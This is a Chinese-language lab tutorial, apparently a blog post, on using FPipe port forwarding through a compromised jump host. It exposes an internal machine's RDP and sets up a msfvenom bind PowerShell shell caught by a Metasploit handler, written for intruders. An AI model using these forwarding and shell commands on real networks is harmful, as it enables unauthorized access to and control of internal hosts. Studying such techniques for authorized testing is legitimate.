天天看點

免殺fpipe端口轉發

forward pipe是一個端口重定向工具,就是可以實作從Internet到區域網路内部機器的特定端口服務的通路,簡單從字面意思來了解即 轉發通過管道,也就是所謂的端口重定向,通過一個管道,把一端端口流量丢給管道的另一端端口。

基礎準備:

本機win10,IP: 192.168.0.2   可以與虛拟機win10通信,不能與虛拟機win12通信

虛拟機 win12 IP: 192.168.5.167 假設是内網中不能出網的一台機器,不能與本機win10通信

虛拟機 win10 IP: 192.168.5.168 内網中的跳闆機,可以與本機win 10,虛拟機win12通信

應用環境:

當入侵一台計算機,發現開了遠端終端而又無法連接配接時,如果在shell裡發現它的IP為内網形式時,就可以使用這個工具來定向,還有當拿下内網一台跳闆機時,可以把内網中不能出網的服務給代出來(例如:遠端連接配接服務,shh等等)。

文章練習目的:

通過在跳闆機執行正向端口轉發,把内網中不能出網的服務給代出來(例如:遠端連接配接服務)。

詳細文法:

FPipe [-hv?] [-brs <port>] IP

-?/-h - shows this help text

-c - maximum number of allowed simultaneous connections. Default is 32 #連接配接的最大數目,預設是32

-l - listening port number #要監聽的TCP端口号

-r - remote TCP port number #要定向到的IP主機的端口号

-s - outbound connection source port number #從哪個端口發出重定向資訊

-v - verbose mode #詳細顯示過程

1.如何利用 fpipe 的 tcp 端口重定向,如,直接通過邊界 殭屍電腦 機器去連目标内網中的那台不能正常連外網 的主機的 rdp

通過目标跳闆機的5555端口來通路内網192.168.5.167主機的rdp服務,

具體如下[正向tcp端口轉發]

FPipe.exe -l 5555 -r 3389 192.168.5.167 -v

免殺fpipe端口轉發

入侵者主機執行mstsc 192.168.5.168 5555

免殺fpipe端口轉發

輸入内網中不能出網的機器的賬号和密碼

免殺fpipe端口轉發

成功轉發,連接配接上内網中不能出網的機器的遠端服務。

免殺fpipe端口轉發

2.利用 fpipe 重定向來連接配接我們的 bind 型 meterpreter,以此讓目标内網中一些不能上外網的機器也能正常的上線,具體如下生成powershell執行語句,儲存在shell.txt

msfvenom -p windows/powershell_bind_tcp LPORT=8080 -f raw -o shell.txt

免殺fpipe端口轉發

//在殭屍電腦上執行,把不能出網的機器的8080端口轉發到殭屍電腦的8080

# FPipe.exe -l 8080 -i 0.0.0.0 -s 8080 -r 8080 192.168.5.167

免殺fpipe端口轉發

把shell.txt的語句複制在cmd或者powershell上執行(無需把shell.txt上傳)

免殺fpipe端口轉發

執行完成之後,背景powershell程序會一直反彈shell

免殺fpipe端口轉發

最後,回到本地的攻擊機上去 bind 我們的 meterpreter,注意此處要寫 殭屍電腦 機器的 ip, 如期所至,一個 bind 會話正常被彈回

msf > use exploit/multi/handler

msf > set payload windows/powershell_bind_tcp

msf > set lport 5555    #本地端口

msf > set rhost 192.168.5.168       #遠端主機IP(也就是殭屍電腦IP)

msf > exploit

免殺fpipe端口轉發

ipconfig  檢視IP,驗證是否是内網中不能出網的機器的powershell

免殺fpipe端口轉發

簡單小結:

工具小巧,功能單一,基本不需考慮免殺,使用過程中,注意放開防火牆對指定端口出入站的限制。

繼續閱讀